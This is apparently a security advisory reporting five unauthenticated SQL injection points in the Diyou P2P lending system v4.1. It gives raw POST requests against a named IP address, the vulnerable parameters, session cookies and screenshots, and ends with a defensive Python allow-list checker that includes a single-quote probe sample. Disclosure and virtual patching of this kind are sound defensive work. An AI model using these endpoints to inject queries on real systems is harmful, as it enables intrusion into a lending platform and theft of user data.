### Brief description:

Five SQL injection points in the Diyou (帝友) P2P lending system (no login required)

### Detailed description:

Diyou P2P lending system v4.1

http://115.47.56.82:80/

1: username

```
POST /blacklist/index.html HTTP/1.1
Content-Length: 14
Content-Type: application/x-www-form-urlencoded
Referer: http://115.47.56.82:80/
Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19
Host: 115.47.56.82
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

username=213
```

![username.png](https://images.seebug.org/upload/201508/1600524260a73afd25a716f7fd6fe0669c293836.png)

2: borrow_style

```
POST /index.php?full_success&page=2 HTTP/1.1
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Referer: http://115.47.56.82:80/
Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19
Host: 115.47.56.82
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

account_status=all&borrow_period=all&borrow_style=213&borrow_type=all
```

![borrow_style.png](https://images.seebug.org/upload/201508/16005423241036d7fbf1360c18d317f1af625d4c.png)

3: keywords

```
POST /index.php?user&q=login HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
Referer: http://115.47.56.82:80/
Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19
Host: 115.47.56.82
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

keywords=123&password=g00dPa%24%24w0rD&url=1
```

![keyword.jpg](https://images.seebug.org/upload/201508/1600561472597d8be4c510a8fd95ca476f3ceaa5.jpg)

### Proof of vulnerability:

4: email

```
POST /?user&q=getpwd HTTP/1.1
Content-Length: 37
Content-Type: application/x-www-form-urlencoded
Referer: http://115.47.56.82:80/
Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19
Host: 115.47.56.82
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Submit=&email=213&username=tsisktri
```

![email.png](https://images.seebug.org/upload/201508/16005754cb75697db1a83a7b471567040ea45155.png)

5: username

```
POST /?user&q=getpwd HTTP/1.1
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Referer: http://115.47.56.82:80/
Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC_2132_saltkey=y44yYWII; DNbC_2132_lastvisit=1439602393; DNbC_2132_sid=CS1ibT; DNbC_2132_lastact=1439606152%09forum.php%09forumdisplay; DNbC_2132_forum_lastvisit=D_45_1439606068D_44_1439606081D_43_1439606152; DNbC_2132_home_readfeed=1439606069; DNbC_2132_checkpatch=1; DNbC_2132_home_diymode=1; DNbC_2132_sendmail=1; DNbC_2132__refer=%252Fbbs%252Fhome.php%253Fac%253Dpm%2526daterange%253D2%2526handlekey%253Dshowmsg_1302%2526mod%253Dspacecp%2526op%253Dshowmsg%2526pmid%253D0%2526touid%253D1302; DNbC_2132_viewid=tid_19
Host: 115.47.56.82
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Submit=&email=sample%40email.tst&username=123
```

![username2.jpg](https://images.seebug.org/upload/201508/1601053838383e6ca3552ef2e094b6b1b26f1756.jpg)
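
A defender-side check for the five reported endpoint and parameter pairs, added here as an example and not taken from the report or from the Diyou code base: it parses a raw POST request and tests each reported parameter against an allow-list, the kind of virtual patch a proxy or log reviewer could apply until the queries themselves are parameterized. The allow-list patterns, the function names and the sample requests are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# (path, required query pair, body parameter, allow-list pattern).
# Paths and parameter names come from the five requests in the report;
# the patterns are assumptions about what each field legitimately holds.
RULES = [
    ("/blacklist/index.html", None, "username", r"[\w.\-]{1,32}"),
    ("/index.php", ("full_success", ""), "borrow_style", r"all|\d{1,4}"),
    ("/index.php", ("q", "login"), "keywords", r"[\w.@\-]{1,64}"),
    ("/", ("q", "getpwd"), "email", r"[\w.+\-]+@[\w\-]+(\.[\w\-]+)+"),
    ("/", ("q", "getpwd"), "username", r"[\w.\-]{1,32}"),
]

# Constructed sample requests (headers trimmed, host is a placeholder).
SAMPLE_OK = ("POST /?user&q=getpwd HTTP/1.1\nHost: example.test\n\n"
             "Submit=&email=sample%40email.tst&username=123")
SAMPLE_BAD = ("POST /index.php?full_success&page=2 HTTP/1.1\n"
              "Host: example.test\n\nborrow_style=213%27&borrow_type=all")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, query pairs, form pairs)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.split("\n", 1)[0].split(" ", 2)
    url = urlsplit(target)
    query = parse_qsl(url.query, keep_blank_values=True)
    form = parse_qsl(body.strip(), keep_blank_values=True)  # URL-decodes values
    return method, url.path, query, form


def violations(raw):
    """Return the reported parameters whose decoded value fails its allow-list."""
    method, path, query, form = parse_request(raw)
    if method != "POST":
        return []
    bad = []
    for rule_path, marker, param, pattern in RULES:
        if path != rule_path or (marker and marker not in query):
            continue
        for name, value in form:
            if name == param and not re.fullmatch(pattern, value):
                bad.append(param)
    return bad
```

The `email=213` value in the report's fourth request also fails the assumed e-mail pattern, so that request is flagged on `email` as captured.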